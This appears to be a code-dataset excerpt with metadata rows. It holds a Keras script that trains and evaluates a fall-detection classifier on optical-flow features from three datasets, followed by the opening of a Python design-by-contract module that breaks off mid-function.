if maxTag < noOfDiv:
maxTag = noOfDiv
bestDiv = div
return div, maxTag
return div
| gpl-3.0 | 8,782,475,459,918,302,000 | 35.563636 | 91 | 0.55644 | false |
AdrianNunez/Fall-Detection-with-CNNs-and-Optical-Flow | temporalnet_combined.py | 1 | 25869 | from __future__ import print_function
from numpy.random import seed
seed(1)
import numpy as np
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
import os
import h5py
import scipy.io as sio
import cv2
import glob
import gc
from keras.models import load_model, Model, Sequential
from keras.layers import (Input, Conv2D, MaxPooling2D, Flatten,
Activation, Dense, Dropout, ZeroPadding2D)
from keras.optimizers import Adam
from keras.layers.normalization import BatchNormalization
from keras.callbacks import EarlyStopping, ModelCheckpoint
from keras import backend as K
from sklearn.metrics import confusion_matrix, accuracy_score
from sklearn.model_selection import KFold, StratifiedShuffleSplit
from keras.layers.advanced_activations import ELU
os.environ["CUDA_DEVICE_ORDER"]="PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"]="3"
# CHANGE THESE VARIABLES ---
mean_file = '/home/anunez/flow_mean.mat'
vgg_16_weights = 'weights.h5'
save_plots = True
# Set to 'True' if you want to restore a previous trained models
# Training is skipped and test is done
use_checkpoint = True
# --------------------------
best_model_path = 'models/'
plots_folder = 'plots/'
checkpoint_path = best_model_path + 'fold_'
saved_files_folder = 'saved_features/'
features_file = {
'urfd': saved_files_folder + 'features_urfd_tf.h5',
'multicam': saved_files_folder + 'features_multicam_tf.h5',
'fdd': saved_files_folder + 'features_fdd_tf.h5',
}
labels_file = {
'urfd': saved_files_folder + 'labels_urfd_tf.h5',
'multicam': saved_files_folder + 'labels_multicam_tf.h5',
'fdd': saved_files_folder + 'labels_fdd_tf.h5',
}
features_key = 'features'
labels_key = 'labels'
L = 10
num_features = 4096
batch_norm = True
learning_rate = 0.01
mini_batch_size = 2048
weight_0 = 2
epochs = 1000
use_validation = True
# After the training stops, use train+validation to train for 1 epoch
use_val_for_training = False
val_size = 200
# Threshold to classify between positive and negative
threshold = 0.5
# Name of the experiment
exp = 'multicam_lr{}_batchs{}_batchnorm{}_w0_{}'.format(
learning_rate,
mini_batch_size,
batch_norm,
weight_0
)
def plot_training_info(case, metrics, save, history):
'''
Function to create plots for train and validation loss and accuracy
Input:
* case: name for the plot, an 'accuracy.png' or 'loss.png'
will be concatenated after the name.
* metrics: list of metrics to store: 'loss' and/or 'accuracy'
* save: boolean to store the plots or only show them.
* history: History object returned by the Keras fit function.
'''
val = False
if 'val_acc' in history and 'val_loss' in history:
val = True
plt.ioff()
if 'accuracy' in metrics:
fig = plt.figure()
plt.plot(history['acc'])
if val: plt.plot(history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
if val:
plt.legend(['train', 'val'], loc='upper left')
else:
plt.legend(['train'], loc='upper left')
if save == True:
plt.savefig(case + 'accuracy.png')
plt.gcf().clear()
else:
plt.show()
plt.close(fig)
# summarize history for loss
if 'loss' in metrics:
fig = plt.figure()
plt.plot(history['loss'])
if val: plt.plot(history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
#plt.ylim(1e-3, 1e-2)
plt.yscale("log")
if val:
plt.legend(['train', 'val'], loc='upper left')
else:
plt.legend(['train'], loc='upper left')
if save == True:
plt.savefig(case + 'loss.png')
plt.gcf().clear()
else:
plt.show()
plt.close(fig)
def sample_from_dataset(X, y, zeroes, ones):
'''
Samples from X and y using the indices obtained from the arrays
all0 and all1 taking slices that depend on the fold, the slice_size
the mode.
Input:
* X: array of features
* y: array of labels
* all0: indices of sampled labelled as class 0 in y
* all1: indices of sampled labelled as class 1 in y
* fold: integer, fold number (from the cross-validation)
* slice_size: integer, half of the size of a fold
* mode: 'train' or 'test', used to choose how to slice
'''
""" if mode == 'train':
s, t = 0, fold*slice_size
s2, t2 = (fold+1)*slice_size, None
temp = np.concatenate((
np.hstack((all0[s:t], all0[s2:t2])),
np.hstack((all1[s:t], all1[s2:t2]))
))
elif mode == 'test':
s, t = fold*slice_size, (fold+1)*slice_size
temp = np.concatenate((all0[s:t], all1[s:t])) """
indices = np.concatenate([zeroes, ones], axis=0)
sampled_X = X[indices]
sampled_y = y[indices]
return sampled_X, sampled_y
def divide_train_val(zeroes, ones, val_size):
""" sss = StratifiedShuffleSplit(n_splits=1,
test_size=val_size/2,
random_state=7)
indices_0 = sss.split(np.zeros(len(zeroes)), zeroes)
indices_1 = sss.split(np.zeros(len(ones)), ones)
train_indices_0, val_indices_0 = indices_0.next()
train_indices_1, val_indices_1 = indices_1.next() """
rand0 = np.random.permutation(len(zeroes))
train_indices_0 = zeroes[rand0[val_size//2:]]
val_indices_0 = zeroes[rand0[:val_size//2]]
rand1 = np.random.permutation(len(ones))
train_indices_1 = ones[rand1[val_size//2:]]
val_indices_1 = ones[rand1[:val_size//2]]
return (train_indices_0, train_indices_1,
val_indices_0, val_indices_1)
def main():
# ========================================================================
# VGG-16 FEATURE EXTRACTOR
# ========================================================================
model = Sequential()
model.add(ZeroPadding2D((1, 1), input_shape=(224, 224, 20)))
model.add(Conv2D(64, (3, 3), activation='relu', name='conv1_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(64, (3, 3), activation='relu', name='conv1_2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(128, (3, 3), activation='relu', name='conv2_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(128, (3, 3), activation='relu', name='conv2_2'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(256, (3, 3), activation='relu', name='conv3_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(256, (3, 3), activation='relu', name='conv3_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(256, (3, 3), activation='relu', name='conv3_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv4_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv4_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv4_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv5_1'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv5_2'))
model.add(ZeroPadding2D((1, 1)))
model.add(Conv2D(512, (3, 3), activation='relu', name='conv5_3'))
model.add(MaxPooling2D((2, 2), strides=(2, 2)))
model.add(Flatten())
model.add(Dense(num_features, name='fc6',
kernel_initializer='glorot_uniform'))
# ========================================================================
# WEIGHT INITIALIZATION
# ========================================================================
layerscaffe = ['conv1_1', 'conv1_2', 'conv2_1', 'conv2_2', 'conv3_1',
'conv3_2', 'conv3_3', 'conv4_1', 'conv4_2', 'conv4_3',
'conv5_1', 'conv5_2', 'conv5_3', 'fc6', 'fc7', 'fc8']
h5 = h5py.File(vgg_16_weights, 'r')
layer_dict = dict([(layer.name, layer) for layer in model.layers])
# Copy the weights stored in the 'vgg_16_weights' file to the
# feature extractor part of the VGG16
for layer in layerscaffe[:-3]:
w2, b2 = h5['data'][layer]['0'], h5['data'][layer]['1']
w2 = np.transpose(np.asarray(w2), (2,3,1,0))
w2 = w2[::-1, ::-1, :, :]
b2 = np.asarray(b2)
layer_dict[layer].set_weights((w2, b2))
# Copy the weights of the first fully-connected layer (fc6)
layer = layerscaffe[-3]
w2, b2 = h5['data'][layer]['0'], h5['data'][layer]['1']
w2 = np.transpose(np.asarray(w2), (1,0))
b2 = np.asarray(b2)
layer_dict[layer].set_weights((w2, b2))
# =============================================================================================================
# TRAINING
# =============================================================================================================
adam = Adam(lr=learning_rate, beta_1=0.9, beta_2=0.999,
epsilon=1e-08)
model.compile(optimizer=adam, loss='categorical_crossentropy',
metrics=['accuracy'])
compute_metrics = False
compute_roc_curve = False
threshold = 0.5
e = EarlyStopping(monitor='val_loss', min_delta=0, patience=100, verbose=0, mode='auto')
# Load features and labels per dataset
h5features_multicam = h5py.File(features_file['multicam'], 'r')
h5labels_multicam = h5py.File(labels_file['multicam'], 'r')
h5features_urfd = h5py.File(features_file['urfd'], 'r')
h5labels_urfd = h5py.File(labels_file['urfd'], 'r')
h5features_fdd = h5py.File(features_file['fdd'], 'r')
h5labels_fdd = h5py.File(labels_file['fdd'], 'r')
# Load Multicam data in a single array
stages = []
for i in range(1,25):
stages.append('chute{:02}'.format(i))
_x = []
_y = []
for nb_stage, stage in enumerate(stages):
for nb_cam, cam in enumerate(h5features_multicam[stage].keys()):
for key in h5features_multicam[stage][cam].keys():
_x.extend([x for x in h5features_multicam[stage][cam][key]])
_y.extend([x for x in h5labels_multicam[stage][cam][key]])
""" _x.append(np.asarray(h5features_multicam[stage][cam][key]))
_y.append(np.asarray(h5labels_multicam[stage][cam][key])) """
# Load all the datasets into numpy arrays
X_multicam = np.asarray(_x)
y_multicam = np.asarray(_y)
X_urfd = np.asarray(h5features_urfd['features'])
y_urfd = np.asarray(h5labels_urfd['labels'])
X_fdd = np.asarray(h5features_fdd['features'])
y_fdd = np.asarray(h5labels_fdd['labels'])
# Get the number of samples per class on the smallest dataset: URFD
size_0 = np.asarray(np.where(y_urfd==0)[0]).shape[0]
size_1 = np.asarray(np.where(y_urfd==1)[0]).shape[0]
# Undersample the FDD and Multicam: take 0s and 1s per dataset and
# undersample each of them separately by random sampling without replacement
# Step 1
all0_multicam = np.asarray(np.where(y_multicam==0)[0])
all1_multicam = np.asarray(np.where(y_multicam==1)[0])
all0_urfd = np.asarray(np.where(y_urfd==0)[0])
all1_urfd = np.asarray(np.where(y_urfd==1)[0])
all0_fdd = np.asarray(np.where(y_fdd==0)[0])
all1_fdd = np.asarray(np.where(y_fdd==1)[0])
# Step 2
all0_multicam = np.random.choice(all0_multicam, size_0, replace=False)
all1_multicam = np.random.choice(all1_multicam, size_0, replace=False)
all0_urfd = np.random.choice(all0_urfd, size_0, replace=False)
all1_urfd = np.random.choice(all1_urfd, size_0, replace=False)
all0_fdd = np.random.choice(all0_fdd, size_0, replace=False)
all1_fdd = np.random.choice(all1_fdd, size_0, replace=False)
# Arrays to save the results
sensitivities = { 'combined': [], 'multicam': [], 'urfd': [], 'fdd': [] }
specificities = { 'combined': [], 'multicam': [], 'urfd': [], 'fdd': [] }
# Use a 5 fold cross-validation
kfold = KFold(n_splits=5, shuffle=True)
kfold0_multicam = kfold.split(all0_multicam)
kfold1_multicam = kfold.split(all1_multicam)
kfold0_urfd = kfold.split(all0_urfd)
kfold1_urfd = kfold.split(all1_urfd)
kfold0_fdd = kfold.split(all0_fdd)
kfold1_fdd = kfold.split(all1_fdd)
# CROSS-VALIDATION: Stratified partition of the dataset into
# train/test sets
for fold in range(5):
# Get the train and test indices, then get the actual indices
_train0_multicam, _test0_multicam = kfold0_multicam.next()
_train1_multicam, _test1_multicam = kfold1_multicam.next()
train0_multicam = all0_multicam[_train0_multicam]
train1_multicam = all1_multicam[_train1_multicam]
test0_multicam = all0_multicam[_test0_multicam]
test1_multicam = all1_multicam[_test1_multicam]
_train0_urfd, _test0_urfd = kfold0_urfd.next()
_train1_urfd, _test1_urfd = kfold1_urfd.next()
train0_urfd = all0_urfd[_train0_urfd]
train1_urfd = all1_urfd[_train1_urfd]
test0_urfd = all0_urfd[_test0_urfd]
test1_urfd = all1_urfd[_test1_urfd]
_train0_fdd, _test0_fdd = kfold0_fdd.next()
_train1_fdd, _test1_fdd = kfold1_fdd.next()
train0_fdd = all0_fdd[_train0_fdd]
train1_fdd = all1_fdd[_train1_fdd]
test0_fdd = all0_fdd[_test0_fdd]
test1_fdd = all1_fdd[_test1_fdd]
if use_validation:
# Multicam
(train0_multicam, train1_multicam,
val0_multicam, val1_multicam) = divide_train_val(
train0_multicam, train1_multicam, val_size//3
)
temp = np.concatenate((val0_multicam, val1_multicam))
X_val_multicam = X_multicam[temp]
y_val_multicam = y_multicam[temp]
# URFD
(train0_urfd, train1_urfd,
val0_urfd, val1_urfd) = divide_train_val(
train0_urfd, train1_urfd, val_size//3
)
temp = np.concatenate((val0_urfd, val1_urfd))
X_val_urfd = X_urfd[temp]
y_val_urfd = y_urfd[temp]
# FDD
(train0_fdd, train1_fdd,
val0_fdd, val1_fdd) = divide_train_val(
train0_fdd, train1_fdd, val_size//3
)
temp = np.concatenate((val0_fdd, val1_fdd))
X_val_fdd = X_fdd[temp]
y_val_fdd = y_fdd[temp]
# Join all the datasets
X_val = np.concatenate(
(X_val_multicam, X_val_urfd, X_val_fdd), axis=0
)
y_val = np.concatenate(
(y_val_multicam, y_val_urfd, y_val_fdd), axis=0
)
# Sampling
X_train_multicam, y_train_multicam = sample_from_dataset(
X_multicam, y_multicam, train0_multicam, train1_multicam
)
X_train_urfd, y_train_urfd = sample_from_dataset(
X_urfd, y_urfd, train0_urfd, train1_urfd
)
X_train_fdd, y_train_fdd = sample_from_dataset(
X_fdd, y_fdd, train0_fdd, train1_fdd
)
# Create the evaluation folds for each dataset
X_test_multicam, y_test_multicam = sample_from_dataset(
X_multicam, y_multicam, test0_multicam, test1_multicam
)
X_test_urfd, y_test_urfd = sample_from_dataset(
X_urfd, y_urfd, test0_urfd, test1_urfd
)
X_test_fdd, y_test_fdd = sample_from_dataset(
X_fdd, y_fdd, test0_fdd, test1_fdd
)
# Join all the datasets
X_train = np.concatenate(
(X_train_multicam, X_train_urfd, X_train_fdd), axis=0
)
y_train = np.concatenate(
(y_train_multicam, y_train_urfd, y_train_fdd), axis=0
)
X_test = np.concatenate(
(X_test_multicam, X_test_urfd, X_test_fdd), axis=0
)
y_test = np.concatenate(
(y_test_multicam, y_test_urfd, y_test_fdd), axis=0
)
# =============================================================
# CLASSIFIER
# =============================================================
extracted_features = Input(
shape=(num_features,), dtype='float32', name='input'
)
x = BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001)(
extracted_features
)
x = Activation('relu')(x)
x = Dropout(0.9)(x)
x = Dense(4096, name='fc2', init='glorot_uniform')(x)
x = BatchNormalization(axis=-1, momentum=0.99, epsilon=0.001)(x)
x = Activation('relu')(x)
x = Dropout(0.8)(x)
x = Dense(1, name='predictions', init='glorot_uniform')(x)
x = Activation('sigmoid')(x)
classifier = Model(
input=extracted_features, output=x, name='classifier'
)
fold_best_model_path = best_model_path + 'combined_fold_{}.h5'.format(
fold
)
classifier.compile(
optimizer=adam, loss='binary_crossentropy',
metrics=['accuracy']
)
if not use_checkpoint:
# ==================== TRAINING ========================
# weighting of each class: only the fall class gets
# a different weight
class_weight = {0:weight_0, 1: 1}
callbacks = None
if use_validation:
# callback definition
metric = 'val_loss'
e = EarlyStopping(
monitor=metric, min_delta=0,patience=100,
mode='auto'
)
c = ModelCheckpoint(
fold_best_model_path,
monitor=metric,
save_best_only=True,
save_weights_only=False, mode='auto'
)
callbacks = [e, c]
validation_data = None
if use_validation:
validation_data = (X_val,y_val)
_mini_batch_size = mini_batch_size
if mini_batch_size == 0:
_mini_batch_size = X_train.shape[0]
history = classifier.fit(
X_train, y_train,
validation_data=validation_data,
batch_size=_mini_batch_size,
nb_epoch=epochs,
shuffle='batch',
class_weight=class_weight,
callbacks=callbacks
)
if not use_validation:
classifier.save(fold_best_model_path)
plot_training_info(plots_folder + exp, ['accuracy', 'loss'],
save_plots, history.history)
if use_validation and use_val_for_training:
classifier = load_model(fold_best_model_path)
# Use full training set (training+validation)
X_train = np.concatenate((X_train, X_val), axis=0)
y_train = np.concatenate((y_train, y_val), axis=0)
history = classifier.fit(
X_train, y_train,
validation_data=validation_data,
batch_size=_mini_batch_size,
nb_epoch=epochs,
shuffle='batch',
class_weight=class_weight,
callbacks=callbacks
)
classifier.save(fold_best_model_path)
# ==================== EVALUATION ========================
# Load best model
print('Model loaded from checkpoint')
classifier = load_model(fold_best_model_path)
# Evaluate for the combined test set
predicted = classifier.predict(X_test)
for i in range(len(predicted)):
if predicted[i] < threshold:
predicted[i] = 0
else:
predicted[i] = 1
predicted = np.asarray(predicted).astype(int)
cm = confusion_matrix(y_test, predicted,labels=[0,1])
tp = cm[0][0]
fn = cm[0][1]
fp = cm[1][0]
tn = cm[1][1]
tpr = tp/float(tp+fn)
fpr = fp/float(fp+tn)
fnr = fn/float(fn+tp)
print('Combined test set')
print('-'*10)
tnr = tn/float(tn+fp)
print('TP: {}, TN: {}, FP: {}, FN: {}'.format(tp,tn,fp,fn))
print('TPR: {}, TNR: {}, FPR: {}, FNR: {}'.format(tpr,tnr,fpr,fnr))
print('Sensitivity/Recall: {}'.format(tp/float(tp+fn)))
print('Specificity: {}'.format(tn/float(tn+fp)))
print('Accuracy: {}'.format(accuracy_score(y_test, predicted)))
sensitivities['combined'].append(tp/float(tp+fn))
specificities['combined'].append(tn/float(tn+fp))
# Evaluate for the URFD test set
predicted = classifier.predict(X_test_urfd)
for i in range(len(predicted)):
if predicted[i] < threshold:
predicted[i] = 0
else:
predicted[i] = 1
predicted = np.asarray(predicted).astype(int)
cm = confusion_matrix(y_test_urfd, predicted,labels=[0,1])
tp = cm[0][0]
fn = cm[0][1]
fp = cm[1][0]
tn = cm[1][1]
tpr = tp/float(tp+fn)
fpr = fp/float(fp+tn)
fnr = fn/float(fn+tp)
tnr = tn/float(tn+fp)
print('URFD test set')
print('-'*10)
print('TP: {}, TN: {}, FP: {}, FN: {}'.format(tp,tn,fp,fn))
print('TPR: {}, TNR: {}, FPR: {}, FNR: {}'.format(tpr,tnr,fpr,fnr))
print('Sensitivity/Recall: {}'.format(tp/float(tp+fn)))
print('Specificity: {}'.format(tn/float(tn+fp)))
print('Accuracy: {}'.format(accuracy_score(y_test_urfd, predicted)))
sensitivities['urfd'].append(tp/float(tp+fn))
specificities['urfd'].append(tn/float(tn+fp))
# Evaluate for the Multicam test set
predicted = classifier.predict(X_test_multicam)
for i in range(len(predicted)):
if predicted[i] < threshold:
predicted[i] = 0
else:
predicted[i] = 1
predicted = np.asarray(predicted).astype(int)
cm = confusion_matrix(y_test_multicam, predicted,labels=[0,1])
tp = cm[0][0]
fn = cm[0][1]
fp = cm[1][0]
tn = cm[1][1]
tpr = tp/float(tp+fn)
fpr = fp/float(fp+tn)
fnr = fn/float(fn+tp)
tnr = tn/float(tn+fp)
print('Multicam test set')
print('-'*10)
print('TP: {}, TN: {}, FP: {}, FN: {}'.format(tp,tn,fp,fn))
print('TPR: {}, TNR: {}, FPR: {}, FNR: {}'.format(tpr,tnr,fpr,fnr))
print('Sensitivity/Recall: {}'.format(tp/float(tp+fn)))
print('Specificity: {}'.format(tn/float(tn+fp)))
print('Accuracy: {}'.format(accuracy_score(y_test_multicam, predicted)))
sensitivities['multicam'].append(tp/float(tp+fn))
specificities['multicam'].append(tn/float(tn+fp))
# Evaluate for the FDD test set
predicted = classifier.predict(X_test_fdd)
for i in range(len(predicted)):
if predicted[i] < threshold:
predicted[i] = 0
else:
predicted[i] = 1
predicted = np.asarray(predicted).astype(int)
cm = confusion_matrix(y_test_fdd, predicted,labels=[0,1])
tp = cm[0][0]
fn = cm[0][1]
fp = cm[1][0]
tn = cm[1][1]
tpr = tp/float(tp+fn)
fpr = fp/float(fp+tn)
fnr = fn/float(fn+tp)
tnr = tn/float(tn+fp)
print('FDD test set')
print('-'*10)
print('TP: {}, TN: {}, FP: {}, FN: {}'.format(tp,tn,fp,fn))
print('TPR: {}, TNR: {}, FPR: {}, FNR: {}'.format(tpr,tnr,fpr,fnr))
print('Sensitivity/Recall: {}'.format(tp/float(tp+fn)))
print('Specificity: {}'.format(tn/float(tn+fp)))
print('Accuracy: {}'.format(accuracy_score(y_test_fdd, predicted)))
sensitivities['fdd'].append(tp/float(tp+fn))
specificities['fdd'].append(tn/float(tn+fp))
# End of the Cross-Validation
print('CROSS-VALIDATION RESULTS ===================')
print("Sensitivity Combined: {:.2f}% (+/- {:.2f}%)".format(
np.mean(sensitivities['combined'])*100.,
np.std(sensitivities['combined'])*100.)
)
print("Specificity Combined: {:.2f}% (+/- {:.2f}%)\n".format(
np.mean(specificities['combined'])*100.,
np.std(specificities['combined'])*100.)
)
print("Sensitivity URFD: {:.2f}% (+/- {:.2f}%)".format(
np.mean(sensitivities['urfd'])*100.,
np.std(sensitivities['urfd'])*100.)
)
print("Specificity URFD: {:.2f}% (+/- {:.2f}%)\n".format(
np.mean(specificities['urfd'])*100.,
np.std(specificities['urfd'])*100.)
)
print("Sensitivity Multicam: {:.2f}% (+/- {:.2f}%)".format(
np.mean(sensitivities['multicam'])*100.,
np.std(sensitivities['multicam'])*100.)
)
print("Specificity Multicam: {:.2f}% (+/- {:.2f}%)\n".format(
np.mean(specificities['multicam'])*100.,
np.std(specificities['multicam'])*100.)
)
print("Sensitivity Multicam: {:.2f}% (+/- {:.2f}%)".format(
np.mean(sensitivities['fdd'])*100.,
np.std(sensitivities['fdd'])*100.)
)
print("Specificity FDDs: {:.2f}% (+/- {:.2f}%)".format(
np.mean(specificities['fdd'])*100.,
np.std(specificities['fdd'])*100.)
)
if __name__ == '__main__':
if not os.path.exists(best_model_path):
os.makedirs(best_model_path)
if not os.path.exists(plots_folder):
os.makedirs(plots_folder)
main() | mit | -6,793,754,311,319,093,000 | 37.325926 | 115 | 0.552205 | false |
ActiveState/code | recipes/Python/436834_Yet_another_Design_Contract_module/recipe-436834.py | 1 | 16029 | #!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
###############################################################################
#
# Yet another invariant/pre-/postcondition design-by-contract support module.
#
# Written by Dmitry Dvoinikov <[email protected]>
# Distributed under MIT license.
#
# The latest version, complete with self-tests can be downloaded from:
# http://www.targeted.org/python/recipes/ipdbc.py
#
# Sample usage:
#
# import ipdbc.py
#
# class Balloon(ContractBase): # demonstrates class invariant
# def invariant(self):
# return 0 <= self.weight < 1000 # returns True/False
# def __init__(self):
# self.weight = 0
# def fails(self): # upon return this throws PostInvariantViolationError
# self.weight = 1000
#
# class GuidedBalloon(Balloon): # demonstrates pre/post condition
# def pre_drop(self, _weight): # pre_ receives exact copy of arguments
# return self.weight >= _weight # returns True/False
# def drop(self, _weight):
# self.weight -= _weight;
# return self.weight # the result of the call is passed
# def post_drop(self, result, _weight): # as a second parameter to post_
# return result >= 0 # followed again by copy of arguments
#
# Note: GuidedBalloon().fails() still fails, since Balloon's invariant is
# inherited.
# Note: All the dbc infused methods are inherited in the mro-correct way.
# Note: Neither classmethods nor staticmethods are decorated, only "regular"
# instance-bound methods.
#
# (c) 2005, 2006 Dmitry Dvoinikov <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
__all__ = ["ContractBase", "ContractViolationError", "InvariantViolationError",
"PreInvariantViolationError", "PostInvariantViolationError",
"PreConditionViolationError", "PostConditionViolationError",
"PreconditionViolationError", "PostconditionViolationError" ]
CONTRACT_CHECKS_ENABLED = True # allows to turn contract checks off when needed
###############################################################################
class ContractViolationError(AssertionError): pass
class InvariantViolationError(ContractViolationError): pass
class PreInvariantViolationError(InvariantViolationError): pass
class PostInvariantViolationError(InvariantViolationError): pass
class PreConditionViolationError(ContractViolationError): pass
PreconditionViolationError = PreConditionViolationError # pep 316 calls it such
class PostConditionViolationError(ContractViolationError): pass
PostconditionViolationError = PostConditionViolationError # pep 316 calls it such
###############################################################################
from types import FunctionType
from sys import hexversion
have_python_24 = hexversion >= 0x2040000
################################################################################
def any(s, f = lambda e: bool(e)):
for e in s:
if f(e):
return True
else:
return False
################################################################################
def none(s, f = lambda e: bool(e)):
return not any(s, f)
################################################################################
def empty(s):
return len(s) == 0
################################################################################
def pick_first(s, f = lambda e: bool(e)):
for e in s:
if f(e):
return e
else:
return None
################################################################################
if not have_python_24:
def reversed(s):
r = list(s)
r.reverse()
return r
################################################################################
def merged_mro(*classes):
"""
Returns list of all classes' bases merged and mro-correctly ordered,
implemented as per http://www.python.org/2.3/mro.html
"""
if any(classes, lambda c: not isinstance(c, type)):
raise TypeError("merged_mro expects all it's parameters to be classes, got %s" %
pick_first(classes, lambda c: not isinstance(c, type)))
def merge(lists):
result = []
lists = [ (list_[0], list_[1:]) for list_ in lists ]
while not empty(lists):
good_head, tail = pick_first(lists, lambda ht1: none(lists, lambda ht2: ht1[0] in ht2[1])) or (None, None)
if good_head is None:
raise TypeError("Cannot create a consistent method resolution "
"order (MRO) for bases %s" %
", ".join([ cls.__name__ for cls in classes ]))
result += [ good_head ]
i = 0
while i < len(lists):
head, tail = lists[i]
if head == good_head:
if empty(tail):
del(lists[i])
else:
lists[i] = ( tail[0], tail[1:] )
i += 1
else:
i += 1
return result
merged = [ cls.mro() for cls in classes ] + [ list(classes) ]
return merge(merged)
###############################################################################
class ContractFactory(type):
def _wrap(_method, preinvariant, precondition, postcondition, postinvariant,
_classname, _methodname):
def preinvariant_check(result):
if not result:
raise PreInvariantViolationError(
"Class invariant does not hold before a call to %s.%s"
% (_classname, _methodname))
def precondition_check(result):
if not result:
raise PreConditionViolationError(
"Precondition failed before a call to %s.%s"
% (_classname, _methodname))
def postcondition_check(result):
if not result:
raise PostConditionViolationError(
"Postcondition failed after a call to %s.%s"
% (_classname, _methodname))
def postinvariant_check(result):
if not result:
raise PostInvariantViolationError(
"Class invariant does not hold after a call to %s.%s"
% (_classname, _methodname))
if preinvariant is not None and precondition is not None \
and postcondition is not None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
postinvariant_check(postinvariant(self))
return result
elif preinvariant is not None and precondition is not None \
and postcondition is not None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
return result
elif preinvariant is not None and precondition is not None \
and postcondition is None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postinvariant_check(postinvariant(self))
return result
elif preinvariant is not None and precondition is not None \
and postcondition is None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
return result
elif preinvariant is not None and precondition is None \
and postcondition is not None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
postinvariant_check(postinvariant(self))
return result
elif preinvariant is not None and precondition is None \
and postcondition is not None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
return result
elif preinvariant is not None and precondition is None \
and postcondition is None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
result = _method(self, *args, **kwargs)
postinvariant_check(postinvariant(self))
return result
elif preinvariant is not None and precondition is None \
and postcondition is None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
preinvariant_check(preinvariant(self))
result = _method(self, *args, **kwargs)
return result
elif preinvariant is None and precondition is not None \
and postcondition is not None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
postinvariant_check(postinvariant(self))
return result
elif preinvariant is None and precondition is not None \
and postcondition is not None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
return result
elif preinvariant is None and precondition is not None \
and postcondition is None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
postinvariant_check(postinvariant(self))
return result
elif preinvariant is None and precondition is not None \
and postcondition is None and postinvariant is None:
def dbc_wrapper(self, *args, **kwargs):
precondition_check(precondition(self, *args, **kwargs))
result = _method(self, *args, **kwargs)
return result
elif preinvariant is None and precondition is None \
and postcondition is not None and postinvariant is not None:
def dbc_wrapper(self, *args, **kwargs):
result = _method(self, *args, **kwargs)
postcondition_check(postcondition(self, result, *args, **kwargs))
postinvariant_check(postinvariant(self))
return result
elif preinvariant is None and precondition is None \
and postcondition is not None and postinvariant is None:
